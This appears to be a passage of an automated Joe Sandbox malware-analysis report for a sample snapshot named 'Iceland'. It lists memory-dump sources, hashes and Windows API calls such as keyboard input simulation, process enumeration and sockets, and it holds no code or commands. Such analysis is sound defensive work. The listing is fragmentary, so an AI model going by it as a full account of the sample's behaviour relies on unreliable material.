                                                                                                                                                                                                                                                                • Opcode ID: f62249ef4f31399be2a7c5e42018fad9530164958f98ee6bae69376f12a63aee
                                                                                                                                                                                                                                                                • Instruction ID: 46af485d631d36d102e35d8cae6e4012b0b1e5365e8de0fac7cd0ded4693ce7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f62249ef4f31399be2a7c5e42018fad9530164958f98ee6bae69376f12a63aee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31218032614118BBEF118F94DC85FFF3B6EEF89754F118124F9049B192CA719C529BA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00A9544D
                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A954A1
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,00ABDCD0), ref: 00A95515
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                • String ID: %lu
                                                                                                                                                                                                                                                                • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                • Opcode ID: da67d82b19057ce483907c54b1fccdf3ea0f8e855d9cc95160eb0ab887fa2b15
                                                                                                                                                                                                                                                                • Instruction ID: 7f21b60b5cf466ca0d36726876a063c3189c69654867ff5306515d9618c8c0e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da67d82b19057ce483907c54b1fccdf3ea0f8e855d9cc95160eb0ab887fa2b15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A316570A00119AFDB11DF68D985EAA77F9EF05308F1440A5F409DB362D771EE45CB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AB4CED
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AB4D02
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AB4D0F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                • Opcode ID: 87a826a16c7b618d4b5bf4f8d9f42b16616ec6bb6a3c453ea0ae0bbff53fc804
                                                                                                                                                                                                                                                                • Instruction ID: 12f7dee8bb9501390db8d0b355c3f5dff9d94798bbdd59c3c30402d159f709da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87a826a16c7b618d4b5bf4f8d9f42b16616ec6bb6a3c453ea0ae0bbff53fc804
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9110671240248BEEF219F69CC06FEB3BACEF89B64F110514FA55E20A2D671DC61DB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A83712
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A83723
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: GetCurrentThreadId.KERNEL32 ref: 00A8372A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A83731
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 00A838C4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8373B: GetParent.USER32(00000000), ref: 00A83746
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00A8390F
                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(?,00A83987), ref: 00A83937
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                                                                                                                • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                • Opcode ID: 02cac565ec105bcfcf45ffe0f2f8377bc239e0ca15275481dd8b6434e3657758
                                                                                                                                                                                                                                                                • Instruction ID: c405c695cd89be6d745cc5bdd81e687b2e3c71bf00fa67304a29f429256b2e5d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02cac565ec105bcfcf45ffe0f2f8377bc239e0ca15275481dd8b6434e3657758
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9811DA726002056BCF11BF749E95AEE776AAF94704F044475FD09AB293EF749905CB30
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AB6360
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AB638D
                                                                                                                                                                                                                                                                • DrawMenuBar.USER32(?), ref: 00AB639C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A7E797
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32 ref: 00A7E7BD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AC0BD4,?), ref: 00A80EE0
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AC0BD4,?), ref: 00A80EF8
                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,00ABDCE0,000000FF,?,00000000,00000800,00000000,?,00AC0BD4,?), ref: 00A80F1D
                                                                                                                                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00A80F3E
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 314563124-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00AAB10C
                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00AAB11A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00AAB1FC
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAB20B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A64D73,?), ref: 00A3E395
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00AA255A
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA2568
                                                                                                                                                                                                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AA25E7
                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AA25F1
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AB6D1A
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AB6D4D
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AB6DBA
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3880355969-0
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A961C8
• GetLastError.KERNEL32(?,00000000), ref: 00A961EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A96213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A9623F
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: c394d20f21a6b863b384908e31a479510d6287ba677cec2ebb5b1d2ee91670f4
• Instruction ID: 21bceac12bca08060c66aaec670969a8b5a56a82224becdc556fb621443777da
• Opcode Fuzzy Hash: c394d20f21a6b863b384908e31a479510d6287ba677cec2ebb5b1d2ee91670f4
• Instruction Fuzzy Hash: B7414E39600620DFCF15EF58C645A5DBBE2EF89710B198498F84A9B362CB34FD41DB91
APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A8B473
• SetKeyboardState.USER32(00000080), ref: 00A8B48F
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A8B4FD
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A8B54F
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 26e9653d9989a6178d1a60ef435bfe66e86b1066a79b44709c5acec89597109a
• Instruction ID: 323b284324b29dc8c68577df2db47921224dcf16acbcc1ea85a2fa409fd50001
• Opcode Fuzzy Hash: 26e9653d9989a6178d1a60ef435bfe66e86b1066a79b44709c5acec89597109a
• Instruction Fuzzy Hash: F0314870A60608AEFF34EB6488067FA7BB5AB58310F04431AE496961E2D37899868775
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00A8B5B8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00A8B5D4
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00A8B63B
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00A8B68D
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: dbfb4490bb11584c66be8d0947ab3a3c2ddc3649648c41e32246a78b99d6b125
• Instruction ID: 32030de65541a3ca5aac793da28660d3d461ac94b662502539291be4c151b97d
• Opcode Fuzzy Hash: dbfb4490bb11584c66be8d0947ab3a3c2ddc3649648c41e32246a78b99d6b125
• Instruction Fuzzy Hash: D2312D30D606485EFF30EB6488057FA7BB6BF95310F04423AE485561E1E77489468BB1
APIs
• ClientToScreen.USER32(?,?), ref: 00AB80D4
• GetWindowRect.USER32(?,?), ref: 00AB814A
• PtInRect.USER32(?,?,?), ref: 00AB815A
• MessageBeep.USER32(00000000), ref: 00AB81C6
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: ba80d5835c9e1e69eb604649e15f9910a344df438775691cde81d1569db20cfb
• Instruction ID: 62909647c7bc8f055eecbf8498ef917dfea370f5fc92f251403c794ae7d00729
• Opcode Fuzzy Hash: ba80d5835c9e1e69eb604649e15f9910a344df438775691cde81d1569db20cfb
• Instruction Fuzzy Hash: F1416030602215DFCB15CF9CE884BE977FDBB45314F1442A8E9559B262CB79A843CF90
APIs
• GetForegroundWindow.USER32 ref: 00AB2187
  • Part of subcall function 00A84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A843AD
  • Part of subcall function 00A84393: GetCurrentThreadId.KERNEL32 ref: 00A843B4
  • Part of subcall function 00A84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A82F00), ref: 00A843BB
• GetCaretPos.USER32(?), ref: 00AB219B
• ClientToScreen.USER32(00000000,?), ref: 00AB21E8
• GetForegroundWindow.USER32 ref: 00AB21EE
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: cd83b927d5ddfe8a581d8d975950ad7c7c3e3a6949140358945b1f7e2e93f613
                                                                                                                                                                                                                                                                • Instruction ID: f19e99d44934466c87b0c268fd7991f33ab20dfc0dbaf64e66d144c2f3de3bb6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd83b927d5ddfe8a581d8d975950ad7c7c3e3a6949140358945b1f7e2e93f613
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4314171D01119AFCB04EFA9D981DEEBBFCEF48304B50846AE415E7212DA759E45CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E8E2
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E8F9
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E924
                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00A8E92F
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                • Opcode ID: 731e9cf4e35503f910bb4ca96f9421507271c56a8cda5ed374771f4c74a5f875
                                                                                                                                                                                                                                                                • Instruction ID: 464866894748e17adc1b74f1c17738b772d4a795b58e689393c6ae5db361179c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 731e9cf4e35503f910bb4ca96f9421507271c56a8cda5ed374771f4c74a5f875
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC21C775D00214EFDB10EFA8DA81BAEB7F8EF85350F144165E905BB341D6709E41C7A1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AB9A5D
                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AB9A72
                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00AB9ABA
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00AB9AF0
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                • Opcode ID: ff3159f16bb991d0a645563ce1bea131bb54818819ea892ef80fc952d26680f9
                                                                                                                                                                                                                                                                • Instruction ID: 7e76f65f4c29321ebc9198bf26cde5474a69e1a75f9b291229f8900051860961
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff3159f16bb991d0a645563ce1bea131bb54818819ea892ef80fc952d26680f9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B321BF34600018EFCF25CF94C898EFB7BB9EF09390F404169FA098B162D7759962DB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00ABDC30), ref: 00A8DBA6
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A8DBB5
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A8DBC4
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ABDC30), ref: 00A8DC21
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                • Opcode ID: d16b44b2c9f69d4512ace50942a420e441404d9655592fc3e823fe09c1765e73
                                                                                                                                                                                                                                                                • Instruction ID: a935222cf18811c4041333359aa33d30f161ef83db7bbc65234861150ddec106
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d16b44b2c9f69d4512ace50942a420e441404d9655592fc3e823fe09c1765e73
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD2183705442059F8704EF38D98499BBBE8FE56364F104A29F499C72E2E731D946CB92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00AB32A6
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AB32C0
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AB32CE
                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AB32DC
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                • Opcode ID: 2276a563ea6bc08d0c7c2197c7643d0875a609dca95aa962638e4c18f38072cb
                                                                                                                                                                                                                                                                • Instruction ID: ef7b6a186a50839d69c5dc438501115425b13763db7363d183ef7c03274065c3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2276a563ea6bc08d0c7c2197c7643d0875a609dca95aa962638e4c18f38072cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D21B832205511AFDB14DB14C855FEA7B59EF55324F148258F4268B2D3C771ED82C7D0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A896E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A88271,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?), ref: 00A896F3
                                                                                                                                                                                                                                                                  • Part of subcall function 00A896E4: lstrcpyW.KERNEL32(00000000,?,?,00A88271,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A89719
                                                                                                                                                                                                                                                                  • Part of subcall function 00A896E4: lstrcmpiW.KERNEL32(00000000,?,00A88271,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?), ref: 00A8974A
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A8828A
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A882B0
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A890BB,00000000,?,0000001C,?,?,00000000), ref: 00A882EB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                • String ID: cdecl
                                                                                                                                                                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                • Opcode ID: 32ad3eb2f7c974ce77b06cfadb4d27e7ba678de22ac249f8e5a313b377be5939
                                                                                                                                                                                                                                                                • Instruction ID: 900ab09bf4ff632616d08d8a839a91877c9d7e6c6fb512566b03d508685d4bd7
